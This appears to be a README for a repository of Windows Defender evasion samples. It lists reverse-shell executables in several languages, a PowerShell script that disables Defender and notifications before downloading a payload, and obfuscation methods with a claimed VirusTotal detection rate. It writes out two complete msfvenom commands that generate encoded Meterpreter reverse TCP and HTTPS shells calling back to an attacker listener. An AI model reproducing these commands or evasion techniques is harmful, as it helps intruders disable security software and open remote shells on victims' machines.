Warning: Downloading items here will likely trigger alerts with your antivirus programs, do so in a controlled enviroment. Executing files here technically should post no harm since they only connet to a prive IP, again, do so in a controlled enviroment.
kib_keyboard.ps1
is a powershell script that disables windows defender and notifications, then downloads the actual payload.
kidx86.exe
is a x86 tcp reverse shell writtern in c++ endcoded using shikata_ga_nai, with byte change, scrambled byes, extra dummy bytes and byte order obfuscation. 12/69 hits in VirusTotal (when it was first submitted). Able to bypass windows defender.kidx86_source.cpp
is the source file of the payload.shell.c
is the raw payload from msfvenom. Generated bymsfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.10 LPORT=4444 -e x86/shikata_ga_nai -i 8 -f c > shell.c
shell.exe
is a generic tcp reverse shell. Xbkbx64.exe
is a x64 tcp reverse shell encoded in a custom c++ payload. Xbkbx86.exe
is a x86 tcp reverse shell encoded in a custom c++ payload. Xbkbpayload.ll
andbkbpayloadraw.cs
are XOR encoded tcp revershell written in a custom C# payload that uses a powershell file to download and execute in memory. (doesn't work)test1.exe
is a tcp reverse shell encoded in custom python payload. Xtesting9.exe
is a edited tcp reverse shell created using veil before changing from .bat to .exe. Xc_rtcp.exe
is a tcp reverse shell written in C. Xcs_rtcp.exe
is a tcp reverse shell written in C#. Xgo_rtcp.exe
is a tcp reverse shell written in go. X
Generating HTTPS reverse shell msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.0.10 LPORT=443 HttpUserAgent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36" -e x86/shikata_ga_nai -i 8 -f c > shell.c
A number of tools and lanaguages was used to the process of trying to bypass windows defender, including: Veil, metasploit windows defender evasion, complining custom payloads, we tried payloads encoded using python, c, c++, c#, ruby, go, java.